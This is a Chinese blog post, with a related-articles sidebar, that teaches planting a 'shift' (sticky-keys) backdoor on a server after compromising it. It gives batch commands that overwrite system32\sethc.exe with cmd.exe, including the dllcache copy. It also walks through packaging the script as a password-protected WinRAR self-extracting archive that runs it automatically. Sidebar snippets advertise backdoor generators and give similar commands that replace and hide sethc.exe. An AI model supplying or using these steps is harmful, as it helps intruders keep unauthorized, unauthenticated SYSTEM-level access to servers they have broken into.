后渗透篇:纯手工打造服务器自解压shift后门【详细演示】

最新推荐文章于 2020-08-24 09:57:53 发布
最新推荐文章于 2020-08-24 09:57:53 发布
阅读量844 收藏
点赞数
原文链接:https://blog.csdn.net/God_XiangYu/article/details/100010647
版权

当你的才华

还撑不起你的野心时

那你就应该静下心来学习

目录

纯手工打造服务器自解压shift后门

0x01 介绍

0x02 实例演示

 

纯手工打造服务器自解压shift后门

0x01 介绍

      很多时候我们拿到一台服务器之后都会留下一个后门程序,方便下次进入。还有,服务器比较主流的就是shift后门,也就是替换服务器自带的粘滞键,为我们的后门文件。

      调用shift后门方法:连续按五下Shift键即可调出

 

0x02 实例演示

1. 创建test.bat 批处理文件,在文件里写入如下内容

以下两段代码的意思是将shift.exe重命名为sethc.exe,且替换系统盘符复制到系统盘符下的cmd.exe,即调用出cmd窗口。


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     cd    %systemroot%\system32
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     copy shift.exe %systemroot%\system32\sethc.exe /
     
     y
    
    
    
   
   
  4. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  5. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     copy cmd.exe  %systemroot%\system32\sethc.exe /
     
     y
    
    
    
   
   
  6. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  7. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     copy cmd.exe  %systemroot%\system32\dllcache\sethc.exe /
     
     y

我这里使用的是WinRAR 压缩软件

3. 将test.bat添加到压缩文件

右键test.bat——>发送到——>压缩(zipped)文件夹——>(创建自解压格式压缩文件打上勾)–然后点击高级–点击设置密码–然后点击确定–点击自解压选项——>【常规】选项下设置解压路径——> 【设置】选项下设置提取后运行的命令后

具体设置步骤图解,请看下面图解操作

选择test.bat 右击选择【添加到压缩文件】

压缩文件名和参数的【常规】界面的压缩选项,勾选【创建自解压格式压缩文件】

压缩文件名和参数的【常规】界面下【设置解压密码】

压缩文件名和参数的【高级】界面的自解压选项,弹出【高级自解压选项】,在【高级自解压选项】的【常规】界面下设置你要保存的路径

【高级自解压选项】的【设置】界面下设置你解压提权文件后要运行的命令

以上步骤完成后,会在桌面生成一个自解压的文件

双击一下打开

输入刚刚设置的解压提取密码

选择【全部选是】

最后,我们为了更好的演示。现在注销当前账号,然后连按Shift键5次,会自动弹出DOS窗口。

 

注意:如果你发现按五下shift调出来的不是如下图所示的的粘滞键,那么你的服务器肯定是被别人入侵了。

参考链接:

               https://www.myhack58.com/Article/60/63/2014/56431.htm

 

我不需要自由,只想背着她的梦

一步步向前走,她给的永远不重

 

bylfsj
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
黑手安全网-------那些年我们抓过的肉鸡课程笔记
边城浪子的博客
11-11 8996
黑手安全网的一套抓鸡教程 地址:链接:https://pan.baidu.com/s/1EK9Q1hYs4_bEN648Bg0LWA 提取码:6u2x 工具集合:链接:https://pan.baidu.com/s/1gJ8l-UGE4LvVFsldJok6CA 提取码:1bkb 一.端口扫描 1.tcp全扫描 抓鸡专用S扫描器.exe 使用方法:输入开始IP...
shift后门生成器
12-07
shift后门生成器 这个东西我个人觉得是很好用的.. 网上有写shift后门密码直接就能破解. 这个还行..
SHIFT后门生成器
03-29
相信大家都会用 生成后 点生成的软件 然后密码登录 可以进行cmd 用着还可以 希望大家去下载试试
超级shift后门生成器
08-31
shift后门生成器shift后门生成器shift后门生成器shift后门生成器shift后门生成器shift后门生成器shift后门生成器
超级Shift后门生成器
11-27
超级Shift后门生成器,好东西要分享给大家
xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本vbs
09-06
### 知识点详细解读 #### 标题解析 1. **xp、2003**:指的是微软公司发布的两个操作系统版本,即Windows XP和Windows Server 2003,这两者均属于较早期的Windows操作系统系列。 2. **开3389**:3389端口是Windows...
服务器shift后门生成器
06-17
服务器shift后门生成器】是一种特殊的工具,主要用于在服务器上创建后门,允许管理员通过简单的命令行操作实现远程访问和控制。这个工具的核心是利用批处理(BAT)脚本,这种脚本语言在Windows系统中广泛使用,...
多语言版SHIFT后门
01-04
标题中的“多语言版SHIFT后门”指的是一个恶意软件,它具有支持多种语言的能力,能够被黑客用作入侵和控制服务器的工具。这种后门可能设计巧妙,使其更难以被安全专家检测到,因为它可以适应不同的语言环境,增加了...
SHIFT后门服务器必用
09-18
SHIFT后门服务器必用
SHIFT后门简单易用可以自己设置密码
03-03
SHIFT后门简单易用可以自己设置密码.大家可以试一下啊。
乌龙市后门清除全套工具
10-26
扫描文件有没有后门,有后面的直接与文件隔离进行删除!
shift后门加强版(含源代码)
09-10
创建管理员帐号为pkw007$ 密码为123456 牛族安全网 http://www.nzhack.net 六月安全网 http://bbs.kusu.org
超强隐藏Shift后门
11-13
服务器后门的招。 1、国内的很多机器都是简体中文版,所以我们一般选择 运行安装中文版shift.bat 2、按5次以上shift键,待弹出窗口后 3、点击设置 4、再点击取消,出现小text框 5、输入密码 helloyun 6、再点击设置 7、点击开启任务管理器 看到什么了? 哈哈 成功了 退出3389 管理员根本无法发现这个后门 因为和按5次以上shift键 一样的画面 此后门无比强大。 如果是繁体的执行另外一个bat即可
(((Shift后门利用工具)))
03-02
Shift后门利用工具 Shift后门利用工具 Shift后门利用工具
各式各样的shift后门
weixin_34122810的博客
11-27 1451
经常会看到一些服务器被入侵后,入侵者会留下一些各式各样的shift后门,五花八门的,各位网络管理员也看看自己的服务器的setch.exe是否被人替换了。 这个直接5次shift后进入分区 这个比较巧妙了,正常的最后那个按钮是灰色的,前两个是不可点击的,这个恰恰想法,点击后,会弹出一个cmd窗口。 这个是比较常见的需要输...
shift后门制作和禁止
ru_li的专栏
06-02 9643
一、什么是shift后门? shift后门是黑客希望以后方便进入服务器而在没有密码的情况下为进入服务器系统而设置的一个后门。 其操作就是在不知道管理员密码的情况下,连续按5次shift键来启动粘滞键,已进入服务器的系统程序管理器。 二、shift后门的制作? 其制作有很多种,下面介绍一种常用的,可以明白其原理自己扩展: 在cmd窗口,敲打命令如下: copy c:\windows\ex
后门shift后门制作及修复方法
shy的博客
08-24 8127
一、如何制作shift后门 方法1 在cmd窗口,敲打命令如下: copy c:\windows\explorer.exe c:\windows\system32\sethc.exe copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe attrib c:\windows\system32\sethc.exe +h attrib c:\windows\system32\dllcache\sethc.ex
几个后门的批处理
charles1990的专栏
04-05 1317
<br />Shift后门<br />-----------------------------------------<br />@echo off<br />cls<br />echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />echo.<br />echo Shift后门 By:qing QQ:33089632<br />echo.<br />echo 使用方法:本文
Shift后门
Au
03-29 2705
shift快捷键 Windows的粘滞键------C:\windows\system32\sethc.exe,它本是为不方便按组合键的人设计的 Windows系统按5下shift后,Windows就执行了system32下的sethc.exe,也就是启用了粘滞键 在进程里面我们可以看到这个程序被系统运行了 不过是以我们自己的用户运权限行的 但是当我们未登陆系统(停留在登陆界面)...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值